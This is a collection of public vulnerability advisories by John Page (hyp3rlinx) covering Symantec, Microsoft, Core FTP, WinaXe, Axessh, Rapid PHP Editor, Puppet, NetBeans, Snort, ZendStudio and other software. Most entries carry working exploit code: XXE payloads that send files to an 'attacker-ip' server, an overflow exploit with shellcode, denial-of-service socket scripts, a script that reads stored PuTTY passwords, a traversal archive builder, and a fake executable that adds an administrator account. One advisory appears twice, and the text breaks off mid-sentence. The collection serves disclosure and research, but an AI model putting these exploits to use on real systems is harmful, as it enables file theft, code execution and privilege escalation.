[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SYMANTEC-VIP-ACCESS-ARBITRARY-DLL-EXECUTION.txt [+] ISR: ApparitionSec Vendor: www.symantec.com Product: === Symantec VIP Access Desktop versions prior to 2.2.2 Vulnerability Type: === Arbitrary DLL Execution CVE Reference: == CVE-2016-6593 Vulnerability Details: = VIP Access Desktop UI Manager invokes DLLs from the current working folder during startup. A malicious local user can create specifically modified DLLs to replace the normal product DLLs required during startup. Then, by redirecting the startup path of the VIP Access Desktop UI Manager the user can cause the VIP Access Desktop UI Manager to invoke the substituted DLL instead of the required product DLL. Any specifically modified code execution could be performed with logged-on user privileges, which is normally user-level access in currently supported operating systems. Ultimately, this problem is caused by a failure to properly validate required product DLLs during start-up. This could result in a local user being able to manipulate VIP Access Desktop to load and execute an arbitrary DLL of the users choice with user-level privileges. Reference: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20161208_00 Disclosure Timeline: == Vendor Notification: February 4, 2016 December 8, 2016 : Public Disclosure Exploitation Technique: === Local [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Microsoft MSINFO32.EXE ".NFO" Files XML External Entity
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt [+] ISR: ApparitionSec Vendor: = www.microsoft.com Product: == Windows System Information MSINFO32.exe v6.1.7601 Windows MSINFO32.EXE Displays a comprehensive view of your hardware, system components, and software environment. Parameters FileName : Specifies the file to be opened. This can be an .nfo, .xml, .txt, or .cab file. Vulnerability Type: === XML External Entity CVE Reference: == N/A Vulnerability Details: = Microsoft Windows MSINFO32.exe is vulnerable to XML External Entity attack which can potentially allow remote attackers to gain access to and exfiltrate files from the victims computer if they open a malicious ".nfo" file via remote share / USB etc. Upon open the file user will see error message like "System Information is unable to open this .nfo file. The file might be corrupt etc.. Tested Windows 7 SP1 Exploit code(s): === Access and exfiltrate Windows "msdfmap.ini" file as trivial POC. This file contains credentials for MS ADO Remote Data Services. 1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd) 2) "payload.dtd" http://attacker-ip:8080?%file;'>"> %all; 3) "FindMeThatBiatch.nfo" (corrupt .NFO file) http://attacker-ip:8080/payload.dtd;> %dtd;]> Double click to open FindMeThatBiatch.nfo, user gets error MSINFO32 opens... attacker gets files. OR open via Windows CL: c:\>msinfo32 \\REMOTE-SHARE\FindMeThatBiatch.nfo Disclosure Timeline: == Vendor Notification: September 4, 2016 Vendor Reply "not meet the bar for security servicing": September 7, 2016 December 4, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Microsoft Windows Media Center "ehshell.exe" XML External Entity
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MEDIA-CENTER-XXE-FILE-DISCLOSURE.txt [+] ISR: ApparitionSec Vendor: == www.microsoft.com Product: == Windows Media Center "ehshell.exe" version 6.1.7600 Vulnerability Type: XML External Entity CVE Reference: == N/A Vulnerability Details: = Windows Media Center "ehshell.exe" is vulnerable to XML External Entity attack allowing remote access to ANY files on a victims computer, if they open an XXE laden ".mcl" file via a remote share / USB or from an malicious "windowsmediacenterweb" web link. Sometimes 'Windows Media Center' will crash, sometimes opens normally and other times will not open, but the files get accessed and exfiltrated. Tested Windows 7 SP1 Exploit code(s): === POC exfiltrate "msdfmap.ini" used by MS ADO Remote Data Services. 1) ATTACKER-IP listener python -m SimpleHTTPServer 8080 2) Create the "FindMeThatBiotch.dtd" DTD file with below contents (host on ATTACKER-IP in directory where python server is listen) http://ATTACKER-IP:8080/%data666;'>"> 3) Create the "EVIL.mcl" file. http://ATTACKER-IP:8080/FindMeThatBiotch.dtd;> %junk; %param666; %FindMeThatBiotch; ]> 4) Get victim to open the EVIL.mcl ... enjoy your files! OR create link on webpage to run the file, but "user has to consent first". XXE POC Disclosure Timeline: === Vendor Notification: September 1, 2016 Vendor opens Case 34970: September 6, 2016 Vendor reply "Wont Fix" : October 19, 2016 December 4, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Core FTP LE v2.2 Remote SSH/SFTP Buffer Overflow
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt [+] ISR: ApparitionSec Vendor: === www.coreftp.com Product: Core FTP LE (client) v2.2 build 1883 Core FTP LE - free Windows software that includes the client FTP features you need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN, browser integration, site to site transfers, FTP transfer resume, drag and drop support, file viewing & editing, firewall support, custom commands, FTP URL parsing, command line transfers, filters, and much, much more. Vulnerability Type: Remote SSH/SFTP Buffer Overflow CVE Reference: == N/A Vulnerability Details: = Core FTP client is vulnerable to remote buffer overflow denial of service when connecting to a malicious server using SSH/SFTP protocol. Upon receiving an overly long string of junk from the malicious FTP server response, Core FTP crashes and the stack is corrupted with several registers EBX, EDX, EDI being overwritten as can be seen below. WinDbg dump... (d9c.16d8): Access violation - code c005 (first/second chance not available) eax=035b ebx=4141 ecx=03ac7e40 edx=41414141 esi=03ac7e38 edi=41414141 eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 ntdll!RtlImageNtHeader+0x92f: 77313ac3 8b12mov edx,dword ptr [edx] ds:002b:41414141= Exploit code(s): === import socket print 'hyp3rlinx - Apparition Security' print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n' host='127.0.0.1' port = 22 s = socket.socket() payload="A"*77500 s.bind((host, port)) s.listen(5) print 'Listening on port... %i' %port print 'Connect to me!' while True: conn, addr = s.accept() conn.send(payload+'\r\n') conn.close() Exploitation Technique: === Remote Severity Level: === High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Putty Cleartext Password Storage
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PUTTY.EXE-INSECURE-PASSWORD-STORAGE.txt [+] ISR: ApparitionSec Vendor: == www.chiark.greenend.org.uk Product: === Putty.exe v0.67 PuTTY is a free and open-source terminal emulator, serial console and network file transfer application. It supports several network protocols, including SCP, SSH, Telnet, rlogin, and raw socket connection. Vulnerability Type: == Cleartext Password Storage Vulnerability Details: = Putty.exe stores Passwords unencrypted for sessions that use a Proxy connection and specify a password to save. Putty saves sessions in Windows registry and passwords are stored in cleartext. By storing the passwords in the clear it can put the Proxy server at risk if the system running Putty is compromised. A casual Putty user may not be aware of how and where passwords are stored, they may assume saving passwords are safe. As Putty does NOT warn the user to the fact that when saving Proxy passwords they are stored in cleartext in the registry. 1) Create and save a Putty session specifying a Proxy for the connection, enter a password and save it. 2) Run the below 'Putty-Insecure-PWD.bat' script to search registry for saved session passwords. "Putty-Insecure-PWD.bat" --- @echo off setlocal ENABLEEXTENSIONS set /p v1=Enter Putty Saved Session: %1 echo Search registry for %v1% session Putty password? pause set KEY_NAME=HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\%v1% set VALUE_NAME=ProxyPassword FOR /F "tokens=1-3" %%A IN ('REG QUERY %KEY_NAME% /v %VALUE_NAME% 2^>nul') DO ( set ValueName=%%A set ValueType=%%B set ValueValue=%%C ) if defined ValueName ( @echo Value Name = %ValueName% @echo Value Type = %ValueType% @echo Value Password = %ValueValue% ) else ( @echo %KEY_NAME%\%VALUE_NAME% not found. ) set "v1=" End BAT script/ e.g. output when run BAT file: Value Name = ProxyPassword Value Type = REG_SZ Value Password = abc123 OR manually open regedit and ctrl+F to find 'SimonTatham' then find your session Key you saved. HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ Next, find String Name 'ProxyPassword' and double click to open value name: ProxyPassword Value data: [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
WinaXe v7.7 FTP 'Server Ready' CMD Remote Buffer Overflow
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt [+] ISR: Apparition Security Vendor: www.labf.com Product: WinaXe v7.7 FTP The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built and provided in the package. All that you need to run remote UNIX and X Applications is included within WinaXe Plus. You operate simultaneously with X11, FTP and Telnet sessions and with your familiar MS Windows applications. Vulnerability Type: === Remote Buffer Overflow Vulnerability Details: == WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors when connecting to a malicious FTP Server and receiving overly long payloads in the command response from the remote server. 220 SERVICE READY 331 USER / PASS 200 TYPE 257 PWD etc... below is POC for "server ready" 220 command exploit when first connecting to a FTP server. Exploit code(s): === import socket,struct #WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit #Discovery hyp3rlinx #ISR: ApparitionSec #hyp3rlinx.altervista.org #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") eip=struct.pack('<L',0x68084A6F)#POP ECX RET jmpesp=struct.pack('<L',0x68017296) #JMP ESP #We will do POP ECX RET and place a JMP ESP address at the RET address that will jump to shellcode. payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20 #Server Ready '220' Exploit port = 21 s = socket.socket() host = '127.0.0.1' s.bind((host, port)) s.listen(5) print 'Evil FTPServer listening...' while True: conn, addr = s.accept() conn.send('220'+payload+'\r\n') conn.close() Exploitation Technique: === Remote Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Axessh 4.2.2 Denial Of Service
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec Vendor: www.labf.com Product: = Axessh 4.2.2 Axessh is a SSH client. It is a superb terminal emulator/telnet client for Windows. It provides SSH capabilities to Axessh without sacrificing any of existing functionality. Furthermore, Axessh has been developed entirely outside of the USA, and can be sold anywhere in the world (apart from places where people aren't allowed to own cryptographic software). 2. Axessh features include: Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4) Compatible with SSH protocol version 1.5 Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4 Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, AES256-cbc Authentication using password Authentication RSA Compression support Connection forwarding, including full support for X-protocol connection forwarding "Dynamic Forwarding" which provides other tasks on the same PC with requested port forwarding Vulnerability Type: Denial Of Service AxeSSH will crash after receiving a overly long payload of junk... Exploit code(s): === 1) Open the settings window for axessh and choose Run then click Run as EXE, this will launch "xwpsshd.exe" crashes with bad protocol version. import socket print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service" ip = raw_input("[IP]> ") port = 22 payload="A"*2000 s=socket.create_connection((ip,port)) s.send(payload) Exploitation Technique: === Remote Severity Level: Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Rapid PHP Editor CSRF Remote Command Execution
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/RAPID-PHP-EDITOR-REMOTE-CMD-EXEC.txt [+] ISR: Apparition Security Vendor: == www.rapidphpeditor.com Product: === Rapid PHP Editor IDE rapidphp2016.exe v14.1 Rapid PHP editor is a faster and more powerful PHP editor for Windows combining features of a fully-packed PHP IDE with the speed of the Notepad. Rapid PHP is the most complete all-in-one software for coding PHP, HTML, CSS, JavaScript and other web development languages with tools for debugging, validating, reusing, navigating and formatting your code. Vulnerability Type: = CSRF Remote Command Execution CVE Reference: == N/A Vulnerability Details: = There is a Remote Command Execution ailment in this IDE, if a user of this IDE is running the internal debug server listening on localhost port 89 and they open a link or visit a malicious webpage then remote attackers can execute arbitrary commands on the victims system. Reference: http://forums.blumentals.net/viewtopic.php?f=15=7062 Exploit code(s): Call Windows "calc.exe" as POC http://127.0.0.1:89/~C/Windows/system32/calc.exe;>Click it! OR http://127.0.0.1:89/~C/Windows/system32/calc.exe; method="post"> document.forms[0].submit() Disclosure Timeline: = Vendor notification: October 5, 2016 Vendor confirms vulnerability: October 7, 2016 Vendor releases fixed version: November 1, 2016 November 2, 2016 : Public Disclosure Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Axessh 4.2.2 Denial Of Service
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec Vendor: www.labf.com Product: = Axessh 4.2.2 Axessh is a SSH client. It is a superb terminal emulator/telnet client for Windows. It provides SSH capabilities to Axessh without sacrificing any of existing functionality. Furthermore, Axessh has been developed entirely outside of the USA, and can be sold anywhere in the world (apart from places where people aren't allowed to own cryptographic software). 2. Axessh features include: Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4) Compatible with SSH protocol version 1.5 Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4 Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, AES256-cbc Authentication using password Authentication RSA Compression support Connection forwarding, including full support for X-protocol connection forwarding "Dynamic Forwarding" which provides other tasks on the same PC with requested port forwarding Vulnerability Type: Denial Of Service AxeSSH will crash after receiving a overly long payload of junk... Exploit code(s): === 1) Open the settings window for axessh and choose Run then click Run as EXE, this will launch "xwpsshd.exe" crashes with bad protocol version. import socket print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service" ip = raw_input("[IP]> ") port = 22 payload="A"*2000 s=socket.create_connection((ip,port)) s.send(payload) Exploitation Technique: === Remote Severity Level: Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
wincvs-2.0.2.4 Privilege Escalation
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINCVS-PRIVILEGE-ESCALATION.txt [+] ISR: ApparitionSec Vendor: == cvsgui.sourceforge.net www.wincvs.org Product: === WinCvs v2.1.1.1 (Build 1) downloads as wincvs-2.0.2.4 v2.0.2.4 WinCVS is a free app for Windows that will help you simplify the development of files for groups of people working on the same software project. Vulnerability Type: = Privilege Escalation CVE Reference: == N/A Vulnerability Details: = WinCvs.exe installs a service with an unquoted service path running with SYSTEM privileges, to exploit a local attacker must place a malicious executable file named "Program.exe" in the path of the service. After service restart or system reboot, it could potentially allow an authorized local user to execute arbitrary code with elevated privileges on the system. Proof: == C:\Users\hyp3rlinx>sc qc CVS [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CVS TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\cvsnt\cvsservice.exe LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : CVSNT DEPENDENCIES : SERVICE_START_NAME : LocalSystem Exploitation Technique: === Local Severity Level: Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Puppet Enterprise Web Interface User Enumeration
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PUPPET-USER-ENUMERATION.txt [+] ISR: ApparitionSec Vendor: == www.puppet.com Product: === Puppet Enterprise Web Interface Tested in version < 2016.4.0 Puppet Enterprise is the leading platform for automatically delivering, operating and securing your infrastructure. Vulnerability Type: === User Enumeration CVE Reference: == N/A Vulnerability Details: = By sending remote HTTP request to Puppet Enterprise Web Interface it is possible to enumerate valid user account names by sending more than 10 requests. If user does not exist we will continue to get 'Authentication failed.' HTTP response from the victim server. However, if the user does exist we will no longer receive such a message confirming the user exists. Exploit code(s): Send login request 11 times, after 10 we will know if user exists or not. FOR /l %i in (1,1,11) DO curl -k https://victim-puppet-server/auth/login?redirect=Enum-Users -d username=IDONTEXIST -d password=1 HTTP 200 OK 'Authentication failed.' FOR /l %i in (1,1,11) DO curl -k https://victim-puppet-server/auth/login?redirect=Enum-Users -d username=BOZO -d password=1 HTTP 200 OK Disclosure Timeline: === Vendor Notification: August 23, 2016 Vendor Acknowledgement: August 23, 2016 Vendor Releases Version: 2016.4.0 October 17, 2016 : Public Disclosure Severity Level: Low [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Puppet Enterprise Web Interface Authentication Redirect
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PUPPET-AUTHENTICATION-REDIRECT.txt [+] ISR: ApparitionSec Vendor: == www.puppet.com Product: Puppet Enterprise Web Interface Version < 2016.4.0 Puppet Enterprise is the leading platform for automatically delivering, operating and securing your infrastructure. Vulnerability Type: = Authentication Redirect CVE Reference: == CVE-2016-5715 Vulnerability Details: = When logging into Puppet Enterprise Web Interface, users can be redirected to attacker controlled servers, if a user logs in using an attacker supplied authentication link it can result in credential theft etc. Fixed in version 2016.4.0 References: https://puppet.com/security/cve/cve-2016-5715 Exploit code(s): === Bypass character filters you need to pass double forward slashes "//" or the redirect will fail. https://victim-puppet-server/auth/login?redirect=//attacker-server Disclosure Timeline: == Vendor Notification: August 23, 2016 Vendor Acknowledgement: August 23, 2016 Vendor Releases Fix: in version 2016.4.0 October 17, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Oracle Netbeans IDE v8.1 Import Directory Traversal
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-NETBEANS-IDE-DIRECTORY-TRAVERSAL.txt [+] ISR: ApparitionSec Vendor: === www.oracle.com Product: = Netbeans IDE v8.1 Vulnerability Type: = Import Directory Traversal CVE Reference: == CVE-2016-5537 Vulnerability Details: = This was part of Oracle Critical Patch Update for October 2016. Vulnerability in the NetBeans component of Oracle Fusion Middleware (subcomponent: Project Import). The supported version that is affected is 8.1. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where NetBeans executes to compromise NetBeans. While the vulnerability is in NetBeans, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of NetBeans accessible data as well as unauthorized read access to a subset of NetBeans accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of NetBeans. Vulnerability in way Netbeans processes ".zip" archives to be imported as project. If a user imports a malicious project containing "../" characters the import will fail, yet still process the "../". we can then place malicious scripts outside of the target directory and inside web root if user is running a local server etc... It may be possible to then execute remote commands on the affected system by later visiting the URL and access our script if that web server is public facing, if it is not then it may still be subject to abuse internally by internal malicious users. Moreover, it is also possible to overwrite files on the system hosting vulnerable versions of NetBeans IDE. References: http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixFMW Exploit Code(s): = , , ";exit();} $zipname=$argv[1]; $exploit_file="RCE.php"; $cmd=''; if(!empty($argv[2])&_numeric($argv[2])){ $depth=$argv[2]; }else{ echo "Second flag must be numeric!, you supplied '$argv[2]'"; exit(); } if(strtolower($argv[3])!="y"){ if(!empty($argv[3])){ $exploit_file=$argv[3]; } if(!empty($argv[4])){ $cmd=$argv[4]; }else{ echo "Usage: enter a payload for file $exploit_file wrapped in double quotes"; exit(); } } $zip = new ZipArchive(); $res = $zip->open("$zipname.zip", ZipArchive::CREATE); $zip->addFromString(str_repeat("..\\", $depth)."\\xampp\\htdocs\\".$exploit_file, $cmd); $zip->close(); echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n"; echo " hyp3rlinx ==="; ?> Disclosure Timeline: === Vendor Notification: September 20, 2016 October 20, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: = CVSS VERSION 3.0 RISK 5.7 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Snort v2.9.7.0-WIN32 DLL Hijack
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SNORT-DLL-HIJACK.txt [+] ISR: ApparitionSec Vendor: = www.snort.org Product: === Snort v2.9.7.0-WIN32 Snort is an open-source, free and lightweight network intrusion detection system (NIDS) software for Linux and Windows to detect emerging threats. Vulnerability Type: === DLL Hijack CVE Reference: == CVE-2016-1417 Vulnerability Details: = snort.exe can be exploited to execute arbitrary code on victims system via DLL hijacking, the vulnerable DLL is "tcapi.dll". If a user opens a ".pcap" file from a remote share using snort.exe and the DLL exists in that directory. Exploit codes(s): = Create tcapi.dll #include //gcc -c tcapi.c //gcc -shared -o tcapi.dll tcapi.o BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "DLL Hijacking", "Done!", MB_OK); break; } return 0; } 1) create any empty file on a remote dir share with a .pcap extension 2) place arbitrary DLL named "tcapi.dll" in remote share 3) open with snort.exe 4) BAM! Disclosure Timeline: === Vendor Notification: April 21, 2016 September 29, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
ZendStudio IDE v13.5.1 Privilege Escalation
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ZEND-STUDIO-PRIVILEGE-ESCALATION.txt [+] ISR: ApparitionSec Vendor: www.zend.com Product: == ZendStudio IDE v13.5.1 Zend Studio is the leading PHP IDE. It is the only PHP IDE that combines mobile development with PHP and includes a sample mobile app with source code. Vulnerability Type: = Privilege Escalation CVE Reference: == N/A Vulnerability Details: = ZendStudio IDE uses weak insecure permissions settings on its files/directory as the Everyone group has full access on it. Allowing low privileged users to execute arbitrary code in the security context of ANY other users with elevated privileges on the affected system. "Everyone" encompasses all users who have logged in with a password as well as built-in, non-password protected accounts such as Guest and LOCAL_SERVICE. Any user (even guest) will be able to replace, modify or change the file. This would allow an attacker the ability to inject code or replace the ZendStudio executable and have it run in the context of the system. e.g. c:\Program Files (x86)\Zend\Zend Studio 13.5.1> icacls ZendStudio.exe ZendStudio.exe Everyone:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) x86_64 version ... c:\Program Files\Zend>icacls * | more Zend Studio 13.5.1 Everyone:(F) Everyone:(OI)(CI)(IO)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(I NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) Exploit code(s): === 1) Compile below 'C' code name it as "ZendStudio.exe" #include int main(void){ system("net user hacker abc123 /add"); system("net localgroup Administrators hacker /add"); system("net share SHARE_NAME=c:\ /grant:hacker,full"); WinExec("C:\\Program Files (x86)\\Zend\\Zend Studio 13.5.1\\~ZendStudio.exe",0); return 0; } 2) Rename original "ZendStudio.exe" to "~ZendStudio.exe" 3) Place our malicious "ZendStudio.exe" in the ZendStudio directory 4) Logout and wait for a more privileged user to login and use ZendStudio IDE then 